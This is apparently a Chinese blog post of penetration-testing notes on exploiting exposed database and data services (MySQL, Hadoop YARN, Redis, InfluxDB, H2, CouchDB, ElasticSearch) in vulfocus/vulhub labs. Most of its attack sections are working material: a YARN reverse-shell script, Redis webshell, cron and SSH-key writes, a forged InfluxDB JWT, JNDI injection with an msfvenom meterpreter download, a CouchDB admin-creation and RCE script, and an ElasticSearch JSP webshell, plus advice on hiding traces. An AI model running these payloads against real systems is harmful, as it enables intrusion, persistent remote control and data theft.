目录
判断服务开放
1.端口扫描
端口扫描工具nmap.....
为什么有数据库,却扫描不到端口? 当数据库在内网的时候,我们的在外网是扫描不到的。有可能是防火墙或者其他的安全服务
2.组合猜测
当面对一个web服务时,我们大概能猜到有没有数据库
3.信息来源
通过渗透过程的一下信息泄露,或者报错判断
判断服务类型
1.数据库
2.文件传输
3.远程控制
4.数据通信
利用方式
1.特性漏洞
2.未授权访问
3.弱口令爆破
MySQL未授权
数据库对应的端口一般是3306
CVE-2012-2122
漏洞说明 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞
所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22
具体看这位师傅的博客
Mysql 身份认证绕过漏洞(CVE-2012-2122)复现_mysql登录漏洞-CSDN博客
for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.247.129 2>/dev/null; done注意
数据库在弱口令爆破时
mysql默认配置本地登录root用户,远程连接请求是拒绝的,可以借助phpmyadmin操作
phpmyadmin是第三方数据库管理应用,搭建在对方服务器上的phpmyaadmin登录mysql数据库,数据库是从本地到本地的过程
Hadoop未授权访问
Hadoop有多个端口(类似组件/插件,比如50070/50075),但是是判断服务开启是看50010端口
使用在线靶场vulfocus,进行测试
vulfocus搭建过程
搭建机:centos
测试机:win10
先在centos上启动 docker
systemctl start docker下载 Vulfocus 镜像
docker pull vulfocus/vulfocus:latest开启靶场
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.0.22 vulfocus/vulfocus
(1)-p 80:80 前端口代表物理机端口,后端口是docker端口
(2)-v /var/run/docker.sock:/var/run/docker.sock 为 docker 交互连接
(3)-e VUL_IP= Docker 服务器 IP
然后到win10上访问centos的ip,默认账密admin,admin
然后到镜像管理,搜索漏洞,然后下载就行
然后返回首页,启动下载的镜像即可
hadoop 命令执行
使用脚本
import requests
target = 'http://192.168.241.142:8088/'
lhost = '192.168.241.128' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)chat的解释
导入必要的模块:
python
Copy code
import requests
定义目标和本地主机:
python
Copy code
target = 'http://192.168.241.142:8088/'
lhost = '39.104.66.132' # 将此处替换为攻击者的IP地址
target: YARN ResourceManager的URL,它是管理资源和调度应用程序的中央组件。
lhost: 反向shell将连接的攻击者的IP地址。
发送一个POST请求以创建一个新的YARN应用程序:
python
Copy code
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
该脚本向YARN ResourceManager发送一个POST请求以创建一个新的应用程序,并从响应中获取生成的application-id。
构建和发送一个恶意的POST请求以提交应用程序:
python
Copy code
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
该脚本构造了一个JSON载荷(data),其中包含有关要提交的应用程序的详细信息。
am-container-spec部分包含一个命令,用于启动一个反向shell。它使用/bin/bash执行Bash shell,并将输入/输出重定向到指定的攻击者IP(lhost)和端口(9999)的TCP连接。
最后,脚本向YARN ResourceManager发送一个POST请求以提交恶意应用程序。
vps监听
nc -nvlp 9999运行脚本即可
Redis未授权访问
Redis默认是没有密码,如果需要就要进行设置
写 Webshell 需得到 Web 路径 利用条件:Web 目录权限可读写 config set dir /tmp #设置 WEB 写入目录 config set dbfilename 1.php #设置写入文件名 set test "<?php phpinfo();?>" #设置写入文件代码 bgsave #保存执行 save #保存执行
CNVD_2015_07557
下载Redis客户端连接工具 大家可以自行在网上找来下载,下载完成后,直接解压,编译,编译后redis-cli默认生成在src目录,进入src目录,将redis-cli复制到 /usr/bin 目录即可以在终端的任意目录下执行。 下面的方法是在公网上下载的步骤,大家有需要可以在自己公网机器上搭建一个。(在自己虚拟机里面搭建也是差不多这样子的步骤)
apt install redis-tools
wget http://download.redis.io/releases/redis-6.0.3.tar.gz
tar -zxvf redis-6.0.3.tar.gz
cd redis-6.0
make
cd src
cp redis-cli /usr/bin3.连接测试是否可以连接成功,直接redis-cli -h ip -p port 当Ping 出现PONG的时候说明存在漏洞,连接成功
有时候会报错
redis-cli -h 192.168.178.143 -p 6379
Could not connect to Redis at 192.168.178.143:6379: No route to host
not connected> 停止Linux的防火墙
$ systemctl stop firewalld.service更改redis.conf
| 将bind 127.0.0.1前面加一个# 这样就可以其他IP访问了 |
方式一,写入webshell 这个方法的前提条件是:1.知道网站根目录绝对路径。 2.对目标网站根目录有写入权限。 redis-cli -h 10.1.1.200 -p 6379 //连接 config set dir /var/www/html //定义目录 config set dbfilename shell.php set x "<?php @eval($_POST['cmd']);?>" save
方式二,写定时任务 redis-cli -h 10.1.1.200 -p 6379 config set dir /var/spool/cron config set dbfilename root set xxx "\n\n*/1 * * * * /bin/bash -i>& /dev/tcp/43.139.44.143/4433 0>&1\n\n" save
写入linux ssh-key公钥 利用条件: 允许异地登录 Redis服务使用ROOT账户启动 安全模式下protect-mode处于关闭状态 允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器
ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
cat key.txt | redis-cli -h 118.31.57.214 -x set xxx
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@118.31.57.214如果有了redis未授权访问权限,我们就有了在对方电脑上写文件的权利。 使用config set dir [path]命令来决定文件的写入路径。 使用config set dbfilename [filename]来决定文件名。 使用set key value,来确定文件的内容,key值任意即可,value即为文件内容。 使用save命令来确定以上所有操作并生成文件。
我们可以在写文件之前先用config get dir与config get dbfilename命令查询这两个字段的值并保存起来,等到我们写完文件后恢复这两个字段的值,增加我们攻击的隐蔽性。 必须在非保护模式下才有可能利用这个漏洞,如果在保护模式下即使访问了redis也是无法执行命令的
RCE自动化利用脚本-vulfocus
https://github.com/vulhub/redis-rogue-getshell
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"
python redis-master.py -r 192.168.178.139 -p 11527 -L 192.168.178.135 -P 8888 -fRedisModulesSDK/exp.so -c "id'RCECVE-2022-0543
5.新漏洞-沙箱绕过vulfocus
Poc:执行id命令,前提知道package.loadlib的位置
eval Tocal o_I= package.loadlib(usr/lib/x86 64-inux-gnu/liblua5.1.so.0""uaopen_io")local io = io_1(): local f = o.popen( id", "r"); local res = f:read(""a"): f:close(): return res' 0
具体看这位师傅的博客
CVE-2022-0543 Redis 沙盒逃逸分析 - FreeBuf网络安全行业门户
influxdb未授权访问
InfluxDB是什么呢 (1)InfluxDB是一个用于存储和分析时间序列数据的开源数据库。简单说,Influxdb就是一个时序数据库。 什么是时序数据库呢,简单说就是数据格式里包含Timestamp字段的数据,比如某一时间环境的温度,CPU的使用率等。 (2)InfluxDB里存储的数据被称为时间序列数据,其包含一个数值,就像CPU的load值或是温度值类似的。时序数据有零个或多个数据点,每一个都是一个指标值。数据点包括time(一个时间戳),measurement(例如cpu_load),至少一个k-v格式的field(也即指标的数值例如 “value=12.13”),零个或多个tag (3)与Mysql相比 measurement类比于SQL里面的table,其主键索引总是时间戳。tag和field是在table里的其他列,tag是索引列,field是普通列
服务的端口号是8086
CVE-2019-20933
#Influxdb-未授权访问-Jw验证不当 默认端口: 8086 8088 influxdb是一款著名的时序数据库,其使用wt作为鉴权方式。在用户开启了认证,但未设孟参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在infiluxdb中执行SQL语句。
vps上搭建vulhub然后
cd /vulhub/influxdb/CVE-2019-20933
docker-compose up -dInfluxDB API默认有
/ping 用来检查 数据库实例状态和版本号 /query 用来查询数据库数据 /write 用来更改数据库数据
访问 vps-ip/query 会弹出登录框
抓包发现了
header里面放Authorization,就是为了验证用户身份,现在前后端分离,有跨域问题,session经常会失效 所以使用了token来验证用户身份
通过JSON Web Tokens - jwt.io生成Cookie,绕过身份验证,构造所需的 Token:
{
"alg": "HS256",
"typ": "JWT"
}
{
"username": "admin",
"exp": 1676346267
}其中,username需要为已存在的用户,exp是时间戳,代表该 Token 的过期时间,所以需要生成一个未来的时间戳,其中1676346267转换为时间是:2023-02-14 11:44:27。 将secret的值置空,得到编码后的 Token
抓取/query页面的数据包,并将请求方式修改为 POST,添加请求头:
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAzODU4MTIzfQ.dILO5ciwTYm7vZe-T9n9g7wIaWuiKbjxQ2lvKIW18Is
添加 POST 请求键值对:db=sample&q=show+users 如果直接这么发,他说我缺少必要参数 missing required parameter
需要加一下
Content-Type:application/x-www-form-urlencoded
主要是利用query和write来操作数据库的数据,先个基础语法:
SHOW USERS 查看当前所有的数据库用户 SHOW DATABASES 查看所有的数据库 SHOW MEASUREMENTS 查询当前数据库中含有的表 SHOW FIELD KEYS 查看当前数据库所有表的字段 CREATE USER LandGrey WITH PASSWORD ‘LandGrey’ 创建 LandGrey:LandGrey 数据库用户 其他查询语法和普通的SQL查询语法类似。 组合利用:
pretty=true 表示优化输出显示 参数 q 传入具体查询数据 参数 db 传入具体数据库名 参数 u 传入数据库用户名 参数 p 传入数据库密码
在/query页面发送 POST 请求:db=sample&q=show users,得到用户信息回显。
H2 database Console未授权访问
H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spimg开发中,如果我们设署如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:默认端口: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true
访问http://your-ip:8080/h2-console/即可查看到H2 database的管理页面。 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令
| 1、下载JNDI-Injection-Exploit https://github.com/welk1n/JNDI-njection-Exploit 2、生成执行RMI Payload-URL -C 执行命令-A 服务器地址 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 49.232.65.159 |
注意:如果在外网搭建的漏洞,就要用服务器运行上面的命令
3、填入URL提交执行 javax.naming.InitialContext
点击连接
返回vps上,发现它返回了数据
然后到/tmp目录下确实多了一个文件夹
以上的一个总体思路,个人理解就是在自己服务器上开启一个监听,让后通过H2 database的管理页面连接,然后我们的攻击命令是创建文件夹touch /tmp/success(在实战中,可以换成shell)
看了其他师傅的利用过程
首先使用msf生成一个Linux木马文件(LHOST和LPOST填写你VPS的IP和空闲端口)
msf5
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=6666 -f elf > shell.elf
msf6
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=6666 -f elf > shell.elf利用python3搭建http服务器
python3 -m http.server 80使用JDNI工具生成RMI利用链,执行的命令是下载后门文件
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "wget http://x.x.x.x/shell.elf" -A VPSip
javax.naming.InitialContext
点击连接,可以下载到了木马文件
给木马文件加执行权限(还是和上面同样的方式)
連接,可以看到靶场地址有加载rml url就说明执行了
启动msf,开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 6666
run最后执行木马文件(方法同上)
CouchDB-权限绕过配合RCE-漏洞
默认端口:5984 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NOSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)CouchDB权限绕过-CVE-2017-12635
CVE-2017-12635
影响版本:小于 1.7.0 以及 小于 2.1.1
http://ip:5984/_utils 跳转到登录页面,不过我们莫得账号密码。
先抓包,然改成以下
This is a normal request to add a user.
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}然后你会发现一个回显 {"error": "forbidden", "reason": "Only _admin may set roles"}, which means only administrator can use the endpoint.
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
Successfully created a user vulhub, with the password vulhub. 具体操作看vulhub/couchdb/CVE-2017-12635 at master · vulhub/vulhub · GitHub
然后访问/_utils登录新建用户账密
成功进入
CVE-2017-12636
需要先上个漏洞创建账户
官方给了python写的exp,可以直接反弹shell! 修改其中的target和command为你的测试机器,然后修改version为对应的Couchdb版本(1或2),成功反弹shell
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth
target = 'http://192.168.100.34:5984'
command = rb"""sh -i >& /dev/tcp/192.168.100.34/2333 0>&1"""
version = 1
session = requests.session()
session.headers = {
'Content-Type': 'application/json'
}
# session.proxies = {
# 'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
"type": "user",
"name": "wooyun",
"roles": ["_admin"],
"roles": [],
"password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
host = session.get(target + '/_membership').json()['all_nodes'][0]
session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
if version == 1:
session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')运行前,先监听
nc -lvvp 2333ElasticSearch文件写入&RCE-漏洞
默认端口:92009300 Elasticsearch 经常和 kibana配合出现在蓝队的使用,主要用作日志的处理和筛选
WooYun-2015-110216
漏洞描述 ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。
所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。
和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web路径如果不在该目录下,也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。
影响范围 1.5.x以前
原理
本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;ElasticSearch目录在/usr/share/elasticsearch。
我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。
测试过程
首先创建一个恶意索引文档:
curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'这是一个使用cURL工具向Elasticsearch发送HTTP POST请求的命令。该请求的目标是将一条文档插入到Elasticsearch中,文档的索引为yz.jsp,类型为yz.jsp,文档ID为1。
具体来说,请求的主体(通过 -d 参数指定)是一个JSON格式的文档,包含一个字段和其对应的值。字段的名称是一个看似 JavaScript 代码的字符串,实际上,它是一段 Java 代码,用于执行文件写入操作。这段 Java 代码的作用是读取HTTP请求中名为f的参数的值,然后将该值写入到服务器上的一个特定文件中。
需要注意的是,这段代码是一个典型的 Java Web 攻击,利用了未经正确过滤的用户输入,通过写入恶意代码到服务器上的文件来实现攻击。这样的攻击可能导致服务器受到损害,甚至被入侵。因此,这种代码应该被谨慎对待,并且开发者应该采取适当的措施来防范此类攻击,例如对用户输入进行正确的验证和过滤。
再创建一个恶意的存储库,其中location的值即为我要写入的路径。
这个Repositories的路径比较有意思,因为他可以写到可以访问到的任意地方,并且如果这个路径不存在的话会自动创建。那也就是说你可以通过文件访问协议创建任意的文件夹。这里我把这个路径指向到了tomcat的web部署目录,因为只要在这个文件夹创建目录Tomcat就会自动创建一个新的应用(文件名为wwwroot的话创建出来的应用名称就是wwwroot了)。
curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'这是一个JSON格式的配置文件,用于配置Elasticsearch中的一个数据存储类型为"fs"(文件系统)的仓库。让我逐步解释其中的内容:
-
"type": "fs": 指定存储类型为文件系统(File System),即将Elasticsearch索引的数据保存在本地文件系统中。 -
"settings": 包含有关存储类型的设置的部分。-
"location": "/usr/local/tomcat/webapps/wwwroot/": 指定了数据存储的位置,即数据将被保存在文件系统的/usr/local/tomcat/webapps/wwwroot/目录下。这是一个具体的路径,可能是Elasticsearch用于存储索引数据的目录。 -
"compress": false: 指定是否启用数据压缩。在这里,设置为false,表示不启用压缩,即索引数据将以原始形式存储。
-
这段配置表明,Elasticsearch将使用文件系统作为数据存储后端,并将索引数据保存在指定的目录中,同时选择不对数据进行压缩。这样的配置可能根据具体的部署需求和环境而有所不同
存储库验证并创建:
curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
完成!
访问http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp,这就是我们写入的webshell。
该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,如:http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success
我们再访问/wwwroot/test.jsp就能看到success了:
CVE-2014-3120
原理
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。
代更新
743
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
